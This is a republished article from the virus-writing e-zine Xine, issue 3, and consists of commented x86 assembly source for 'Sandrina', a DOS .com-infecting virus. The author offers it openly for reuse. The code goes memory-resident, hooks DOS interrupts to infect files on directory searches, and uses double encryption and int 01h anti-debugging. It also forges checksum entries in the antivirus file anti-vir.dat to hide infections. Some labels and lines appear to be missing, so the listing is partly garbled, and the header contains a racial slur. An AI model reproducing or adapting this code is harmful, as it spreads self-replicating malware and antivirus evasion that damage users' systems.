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Xine - issue #3 - Phile 210

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 · 6 months ago

| Xine - issue #3 - Phile 210 |

; Sandrina : She was really too sexy for me
; ----------
; Author : .UnknwoN MnemoniK
; Origin : .Belgium
; Host : .com non overwritter
; .enun com included
; Per Process : .become TSR ( by dos 4A/48/49 )
; Hook/res : .int 21h function 4Eh/54h
; .int 24h handler! just for niggas who want spread it!
; Note : .This virus is just an exemple virus to use san anti-vir.dat
; hacka engine , you can use it , modify it , pick it all times
; you want. I don't add poly or stealth things because I don't
; find it interresting in this case , a quite simple com
; non-overwritter
; Specificty: .Double encrypted + Anti debugging : Int 01h as the decryptor
; yes , Two days ago , I was looking 29A and I saw
; the desassembling of a virus who use this technique
; I decide to test it myself and when an Int 01h are
; executed being traced, no decryption is produced and the code
; crash. His two encryption loop give him a gewd anti-heuristic
; protection
; .Force Anti-vir.dat : I looked the bozo tutorial
; and I decide also to code all this routine in one program
; who originally just decrypt this anti-vir.dat , but now
; it's modify all the file and rplace the value of the
; infected as that place . He is quite gewd coding , you can
; use it for yar virii if u want
; .Intelligent Interrupt 24 handler , you ever used disk8 ?
; Ok , so lets make a conversation about it , when u put an
; Int24 handler and when the disk is writeprot , there's a dirty
; sound isn't ? Yeah , you see , but now think if ya have like
; each 4E/EF this sound 4 ou 5 times in one dir , this is
; suspect , so now , the virus determine if it's a drive or a
; disk , if it's a floppy , is the disk8 changed from the floppy
; disk since last read ? if yes then put off the Write protected
; internal flag , else then if the write proteced flag activate ,
; skip the infection procedur , now there's a quite gewd
; optimization , I have tested it , no problem , it's work fine!
; Warning: a bug was reported , decryptor seems to detected by
; TBAV and the C flag appears , but it comes only with the 2nd
; 3rd infection in the same directory , if you found it , don't
; forget :

.model tiny

org 100h


jmp start0 ; this jump will be reconstruct
; at next generation

call virus ; Now we call virus for tha delta off.

virus: pop bp ; delta offset ( if you don't
sub bp,offset virus ; understand that , press ctrl-alt-del
; 3 time

; Part One
; i11
; 11 Decryption zone
; 1111

mov ax,3501h ; Get Int 01 adress
int 21h ; ask dos , dos do it !
; address will be back in es and bx
push es ; save es:bx
push bx

sub ah,10h ; now we have in ax = 2501h
push ax ; save it on stack
lea dx,[bp+encrypt_loop0] ;put in dx offset decrypt loop + delta
int 21h ; move the int 01 handler here !

lea si,[bp+encrypt_begin] ; si = start decryption offset
mov cx,encrypt_end-encrypt_begin

int 01h ; now decrypt it , when it's traced
; the prog crash !
jmp encrypt_begin ; jump

encrypt_loop0: ; but in reality , there is it

db 80h,34h ; alias xor byte ptr [di],xx
key1: db 00
inc si ; increment si
loop encrypt_Loop0 ; make the boucle untill cx=0


encrypt_begin: ; secondary encryption

pop ax ; ax = 2501h
pop dx ; dx = int 01 old offset
pop ds ; ds = int 01 old seg
int 21h ; restore old int 1 seg:off

push cs cs
pop es ds

lea si,[bp+encrypt_begin1] ; second encrypt loop
mov cx,encrypt_end-encrypt_begin1


mov al,0adh ; anti debugging trick
mov dx,64h ; I remove stack trick
out dx,al ; because it allways crash

db 80h,04h ; alias add byte ptr [si],xx
key2: db 00

mov al,0aeh
mov dx,64h
out dx,al

inc si

loop encrypt_loop2 ; do the loop

; Part 2 : Put the virus in memory
; ýýý22
; x22', 2ø) Put in memory the virus
; 22222


MOV di,100h ; push 100h
push di ; return at 100h next boot
LEA si,[bp+save] ;
movsw ; retore original bytes

mov ax,5469h ; sexy sandrina ;)
int 21h

cmp ax,0666h ; test if we are already in memory
je return

mov ax,3521h ; save 21h adress
int 21h

mov word ptr cs:[bp+Old21S],es ; save here the Int 21 seg
mov word ptr cs:[bp+Old21O],bx ; " " " " " off

push cs ; es = cs
pop es

mov ah,4ah ; modify memory size
push ax
mov bx,0FFFFh ; get max memory
int 21h ; it must return with error and
; how memory is free

sub bx,((real_end-start0)+100h)+1 ; reduce it

pop ax ; modify mem size
int 21h ;
jc return ; if error ? Don't put the virus

mov ah,48h ; allocate memory
mov bx,((real_end-start0)+100h) ; all we need !
int 21h

push ax ; dec ax ( new seg )
dec ax ; to mark and hide this seg to dos
mov es,ax

mov byte ptr es:[0],'Z' ; mask it for dos
mov word ptr es:[1],08

pop es ; es = new seg

xor di,di
push di
pop si
mov cx,100h
push cx
repz movsb ; put the psp

push cs ; ds <- cs
pop ds

lea si,[bp+start]
pop di
mov cx,real_end-start0
repz movsb ; put the code

push ds es ; ds <- es
pop ds

mov ax,2521h
mov dx,offset NewInt_21 ; DS:DX = Int_21_Handler
int 21h ; Set the new handler

pop ds ; ds <- cs

return: push cs ; cs = es = ds
push cs
pop es
pop ds
mov ah,1ah ; restore the dta
mov dx,80h ;
int 21h ; ask dos , dos do it !

; we return here to the host here , look , only a stupid ret!

ret ; remember , push di ( di = 100h )

; Part Three
; 33333
; -333 3ø) The Interrupt controller
; 33333

fake_24: mov al,3
mov byte ptr cs:[iswriteprot],1

Old24O: dw 0
Old24S: dw 0

NewInt_21: pushf ; save the flag

cmp ah,4eh ; intercept FindFirst
je Handler21
cmp ax,5469h ; Verify flag infos ( everybody don't
je check_return ; care about it )

popf ; restore it

JmpTO: db 0eah ; jump to the real Int 21h
Old21O: dw 0
Old21S: dw 0

Do_Int21: pushf ; here we make an Int 21h
push cs
call JmpTO

check_return: mov ax,0666h ; return with our verification code


pusha ; save register + seg
push es
push ds

mov ah,2Fh ; save the current dta
int 21h

push es
push bx

push cs ; and set ES = DS = CS
push cs
pop ds
pop es

mov ah,1ah ; fix our dta
lea dx,[dta]
int 21h

call check_conditions ; if we have enough memory for
jc fin0 ; modifing anti-vir.dat ?
mov word ptr [temporary_seg],ax ; if yes , save the temporary seg

mov ax,3524h ; now we hide error handle for user
int 21h ; get adress
mov word ptr cs:[Old24S],es ; and stock it here!
mov word ptr cs:[Old24O],bx

mov ax,2524h ; and now we fix it at our handle
mov dx,offset fake_24 ; everyting is kewl , no more
int 21h ; user aler

mov ah,19h ; get current drive from dos
int 21h

cmp al,1 ; is it <> a or b then put iswriteprot
ja changethings ; off

mov ah,16h ; if a disk8 drive then set if
mov dl,0 ; disk are changed since last times
int 13h ; if so , put iswriteprot off

cmp ah,6 ; is ah = 6 ?
jne don_tchange ; no then don't change anything


mov byte ptr [iswriteprot],0 ; put off siwriteprot

cmp byte ptr [iswriteprot],1 ; if iswriteprot on then skip
je end_of_find ; infection procedure

mov ah,4eh ; Find first (Com)
mov cx,2
lea dx,[com]

Call Do_int21 ; equal Int 21

jc end_of_Find ; FF/FN
call infect

cmp byte ptr [iswriteprot],1 ; is disk protected ?
je end_of_Find ; nah , so continue infections

next0: mov ah,4fh
jmp next


mov dx,word ptr cs:[Old24O] ; restore old Int 24 Seg:Off
mov ax,word ptr cs:[Old24S] ; take a look on it !
push ax
pop ds
mov ax,2524h ; restore it
int 21h ; ask dos , dos do it!

push cs
pop ds

call Uncheck ; De-allocate memory

fin0: mov ah,1Ah ; Fix Dta
pop dx
pop ds
int 21h
pop ds ; restore seg+reg
pop es
jmp JmpTo ; return to int 21

go: ; Lseek ( hehehehe )

mov ah,42h
xor cx,cx
xor dx,dx
int 21h

inf_ret0: ret

;********************************************** Add yar infection proc here !
; Part Four
; 44 4
; 4444 4ø) Com infection
; 4


mov ah,byte ptr [dta+22] ; infect only if sec <> 02
and ah,00001111b
xor ah,00000001b
je inf_ret0

mov ax,4301h ; destroy attribute
xor cx,cx
lea dx,[dta+30]
push dx
int 21h

mov ax,3d02h ; open in r/w
int 21h
xchg ax,bx

mov ah,3fh ; save 3 first byte
mov cx,3
lea dx,[save]
int 21h

mov bp,2 ; only for anti-vir if infection Ok

push word ptr [dta+24]
cmp byte ptr [save],'M' ; check if exe
je close
cmp byte ptr [save],'Z' ; check if exe
je close

mov al,0
call go

mov byte ptr [dta+25],0E9h ; make the jump
sub byte ptr [dta+26],3

mov ah,40h ; write it
mov cx,3
lea dx,[dta+25]
int 21h

mov al,2
call go ; go to the end

sub ax,7
mov cx,dx
mov dx,ax
mov ax,4200h ; go to the end -7
int 21h

mov ah,3fh ; read 7 last bytes of the files
mov cx,7
lea dx,[buffer7]
int 21h

add word ptr [buffer7+5],fin-start0 ; add the size of the file

call encrypt_and_write ; write the virus encrypted

dec bp ; bp = 1 ( dec bp , flag Z = 1
; infection OK -> Modify Anti-vir.dat

mov ax,5701h ; fix sec = 02
mov cx,word ptr [dta+22]
and cl,11110000b
inc cl
pop dx
int 21h

mov ah,3eh ; close the file
int 21h

pop dx
mov ax,4301h ; restore attribute
mov cx,word ptr [dta+21]
int 21h

dec bp
jnz Closing_star ; if no infection don't change anti-v.

call antivmodif ; update anti-vir.dat

ret ; return to tha caller


push cs ; save cs cs
push cs

mov es,word ptr [temporary_seg] ; copy in temporary_seg the virus
xor di,di
mov si,100h
mov cx,fin-start0+3
repz movsb

mov ah,byte ptr [dta+26] ; encrypt encrypt_end-encrypt_begin1
mov byte ptr es:[key2-100h],ah
lea si,[encrypt_begin1-100h]
mov cx,encrypt_end-encrypt_begin1

sub byte ptr es:[si],ah
inc si
loop enc_loop0 ; do the encryption!

mov ah,byte ptr [dta+27] ; encrypt encrypt_end-encrypt_begin
mov byte ptr es:[key1-100h],ah
lea si,[encrypt_begin-100h]
mov cx,encrypt_end-encrypt_begin

xor byte ptr es:[si],ah
inc si
loop enc_loop1 ; do the encryption!

mov ah,40h ; write the encrypted virus
mov cx,fin-start0 ; put in cx size
push es
pop ds
lea dx,[start0-100h] ; hehe , we are in meeemory !
int 21h ; !DO IT! Here we gooo!

pop ds
pop es


; Part five
; 5555
; 5555 5ø) Check if condition aivable for modifing Anti-vir.dat
; 55555


mov ah,48h ; can we allocate a seg ?
mov bx,65000/16 ; return with C or not C
int 21h


mov es,word ptr [temporary_seg] ; delocate the seg who was
mov ah,49h ; allocate upper
int 21h
AM_ret: ret

; Here's the C flag totally out , so , I'm the first to fuck Thunderbyte too
; deep !
; 66'
; 6666 6ø) Modifing Anti-vir.dat
; 6666


mov ax,4300h ; check if anti-vir.dat
lea dx,[antiv] ; really exist
int 21h
jc AM_ret

mov ax,3D00h ; open anti-vir.dat
mov dx,offset antiv
int 21h
xchg ax,bx

mov word ptr [ncounter],0 ; counters are important , they
mov word ptr [counter],0 ; serve in good part locations

mov ax,4202h ; go on the end
push ax
xor cx,cx
push cx cx cx ; push 3 times 00
pop dx
int 21h

sub ax,80h ; sub entry of high size

sub ax,40h ; couting
inc byte ptr [ncounter] ; the number of sections
; to scan
cmp ax,0
jnz loopingzero

pop dx cx
pop ax
sub al,2 ; go on the first
int 21h

mov ah,3fh ;read 128 first bytes and store
mov cx,80h+40h ; it into Build0
mov dx,offset build0 ;
int 21h

testfile: ; I was drunk that day...

mov cx,12
lea si,[buildtable] ; get buildtable
lea di,[dta+30] ; here we test the name
loop0: ; here I test if the name of
mov al,byte ptr [si] ; the file is the good one
cmp byte ptr [si],0 ; in the good section
je thatsOK
cmp byte ptr [di],al
jnz notOk
inc si
inc di
loop loop0 ; check every part

notOk: inc byte ptr [counter] ; if all section scanned ?
mov ah,byte ptr [ncounter]
cmp byte ptr [counter],ah
je nohere ; yes ? ok , bye....
mov ah,3Fh
mov cx,40h
mov dx,offset buildtable ; read next section
int 21h
jmp testfile

nohere: mov ah,3eh ; if not in the list , so
int 21h ; close anti-vir.dat
ret ; tchao bella...


mov ax,word ptr ds:[build0+56h] ; get the decryptor key
mov word ptr ds:[key],ax

lea si,[buildtable+0ch] ; mov si the start of the
; section
mov dx,1ah ; read bozo tutorial
mov cx,word ptr key
xor cx,word ptr ds:[si-0ch]

decryptloop: ; decrypt the zone

mov ch,cl ; mathematical functions
dec cx ; I can't explain it anymore
and cl,0fh ; Wich this way of encryption
mov ax,word ptr ds:[si] ; antivir.dat struct appears
xor ax,cx ; totally out !
rol ax,cl
sub ax,cx
xor ax,word ptr key

mov word ptr ds:[si],ax
inc si
inc si
dec dx
jnz decryptloop ; loop here

mov ah,3eh ; close the file
int 21h

mov ax,3d00h ; open the file in the buildt.
lea dx,[buildtable]
int 21h
xchg ax,bx ; open physically the file

mov ah,3fh ; read 20h first bytes
mov cx,20h
lea dx,[buildtable+0eh]
int 21h

mov al,2 ; go at the end
call go
; now ax = real size of the
; file without modification
; of the dta
mov word ptr [buildtable+0ch],ax ; and save it here

xor ax,ax
call go ; go on the entry of the file

lea si,[start0] ; fix the first bytes of
lea di,[buildtable+30h] ; the entry-point
push cs ; in buildtable
pop es

push ds
push ax dx

mov ah,3fh ; yeah , now , put
mov cx,word ptr [buildtable+0ch] ; all the file in mem
mov ds,word ptr [temporary_seg]
xor dx,dx
int 21h

pop dx ax ;
call calculation ; and render checksums
pop ds


mov word ptr [buildtable+2Eh],dx ; save checksums
mov word ptr [buildtable+38h],ax

lea si,[buildtable] ; rendering the Validation
; key
xor ax,ax
mov cx,03eh

pkt_loop: add ax,ax
add al,byte ptr ds:[si]
inc si
do_the_xor: xor ax,0a097h
js do_the_xor
loop pkt_loop

mov word ptr [buildtable+3eh],ax ; put the Validation key


lea si,[buildtable+0ch] ; all is Ok , encrypt the
; section now !
mov dx,1ah
mov cx,word ptr [key]
xor cx,word ptr ds:[si-0ch]

encrypt_loop: mov ch,cl
dec cx
and cl,0fh
mov ax,word ptr ds:[si]
xor ax,word ptr [key]
add ax,cx
ror ax,cl
xor ax,cx
mov word ptr ds:[si],ax
inc si
inc si
dec dx
jnz encrypt_loop ; invert than above

mov ax,3d02h ; Open anti-vir.dat
mov cx,010b
mov dx,offset antiv
int 21h
xchg ax,bx

mov ax,40h ; render position of the section
xor cx,cx
mov cl,byte ptr [counter] ; get number of the section
mul cx ; and multiply it by 40
add ax,80h ; add 80h (128 first bytes)
xchg ax,dx ; we have the right offset now!
xor cx,cx
add ax,40h
mov ax,4200h ; go in it
int 21h

mov ah,40h ; write it
mov cx,40h
mov dx,offset buildtable ; go at buildtable offset
int 21h

mov ah,3eh ; close
int 21h
ret ; return with all is Ok

calculation: ; render checksum

push bx ; this is an important part
mov cx,word ptr [buildtable+0ch] ; if u wanna understand
; go at Bozo tutorial
mov di,cx
shr di,1
xor ax,ax
xor dx,dx

startit: test ah,80h
jz krad1
xor ax,0A097h

krad1: test dh,80h
jz krad2
xor dx,0a097h

krad2: mov bx,ax
add bx,ax
mov cx,dx
add cx,dx
mov dl,ah
add ax,bx
mov ah,bh
add dx,cx
mov dh,ch
dec di
jnz startit
pop bx

com: db '*.com',0 ; infos
save: int 20h
db 0
antiv: db 'anti-vir.dat',0
buffer7: db 7 dup (0)
key: dw ?
counter: dw ?
ncounter: dw ?
iswriteprot: dw ?
temporary_seg: dw ?
dta: db 42h dup (?)
build0: db 80h dup (?)
buildtable: db 192-80h-13 dup (?)
end start

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